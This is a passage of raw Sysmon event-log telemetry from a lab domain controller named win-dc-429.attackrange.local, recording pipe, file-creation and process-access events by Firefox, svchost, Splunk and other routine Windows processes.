17141700x80000000000000001052169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:06.219{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.19.171776309C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001052168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.188{5EBD8912-7A84-6151-1A78-00000000FC01}6604ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=C12905D7CC5BD55A383D3273D60B3FB8,SHA256=C0B5C9DDF167548237E54436ECD2CC64C74E397BBC788C681D8E22A6AEAAD59E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.188{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-84A1-6151-6779-00000000FC01}2988C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 10341000x80000000000000001052166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.188{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B40-6151-3F78-00000000FC01}6828C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 10341000x80000000000000001052165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.188{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3E-6151-3D78-00000000FC01}4940C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 10341000x80000000000000001052164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.188{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3E-6151-3C78-00000000FC01}6364C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 10341000x80000000000000001052163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-84A1-6151-6779-00000000FC01}2988C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 10341000x80000000000000001052162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B40-6151-3F78-00000000FC01}6828C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 10341000x80000000000000001052161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3E-6151-3D78-00000000FC01}4940C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 10341000x80000000000000001052160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3E-6151-3C78-00000000FC01}6364C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 10341000x80000000000000001052159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-84A1-6151-6779-00000000FC01}2988C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+1b66eb1|C:\Program Files\Mozilla Firefox\xul.dll+1d25fa7|UNKNOWN(0000026DBAAE3E5F) 10341000x80000000000000001052158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B40-6151-3F78-00000000FC01}6828C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+1b66eb1|C:\Program Files\Mozilla Firefox\xul.dll+1d25fa7|UNKNOWN(0000026DBAAE3E5F) 10341000x80000000000000001052157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3E-6151-3D78-00000000FC01}4940C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+1b66eb1|C:\Program Files\Mozilla Firefox\xul.dll+1d25fa7|UNKNOWN(0000026DBAAE3E5F) 10341000x80000000000000001052156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3E-6151-3C78-00000000FC01}6364C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9f964f|C:\Program Files\Mozilla Firefox\xul.dll+a47238|C:\Program Files\Mozilla Firefox\xul.dll+e4bf58|C:\Program Files\Mozilla Firefox\xul.dll+215d1b|C:\Program Files\Mozilla Firefox\xul.dll+c97ea4|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+1b66eb1|C:\Program Files\Mozilla Firefox\xul.dll+1d25fa7|UNKNOWN(0000026DBAAE3E5F) 10341000x80000000000000001052155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.157{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-79BE-6151-D877-00000000FC01}5020C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.157{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-79BE-6151-D877-00000000FC01}5020C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x80000000000000001052153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:19:06.141{5EBD8912-7F30-614D-0F00-00000000FC01}288\TSVCPIPE-563d5c53-1eb0-4fd8-aa54-f73c624f22a0C:\Windows\System32\svchost.exe 10341000x80000000000000001052152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.141{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-79BC-6151-D377-00000000FC01}4136C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.141{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-79BC-6151-D377-00000000FC01}4136C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.141{5EBD8912-7F30-614D-1100-00000000FC01}4041624C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.119{5EBD8912-7F30-614D-1100-00000000FC01}4041624C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.119{5EBD8912-7F30-614D-1100-00000000FC01}4041624C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.856{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9FAE62A0181D4743CB53B8B07B071DA4,SHA256=05E84911FB5B1272F944A1DC0246E670F9132306CBC66F39141BBC11BA47480C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.855{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5DFDEEEE7677AA55AF1B3DF1AF47F4E8,SHA256=439547EB7BCF76E4B108EF0A189C157A60B90666A56BDBDC4FAEA25A29ECD7AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.854{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=87DB55180A19108EF4D65BA91CBB2645,SHA256=FAA150D639B289FF5FD7E0B9EFDED4B109FC456F829F69E82BDB5EF141FE7246,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.849{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C3BB0363CCCA85AC4EB08861DAB1AD2B,SHA256=32F4E194406ED7F747844394A76983814450FED81E718EA7EFD628CFFD3F98AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.839{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.839{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.839{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.833{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=736C99C7A1C457DD8892D933598C5363,SHA256=8F8FF723E061FA2F782DC4544417B8B427AB71324478BC306EB64FC82307C251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.829{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\termination\respondent-20210924073323-000MD5=4EE354E9B3F597517857217CF8AE4AB0,SHA256=9C13E1669CD001EE8AC3EDD96CAEF64984205BE8886FECBC9246F3C9FF9FE8EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.825{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTE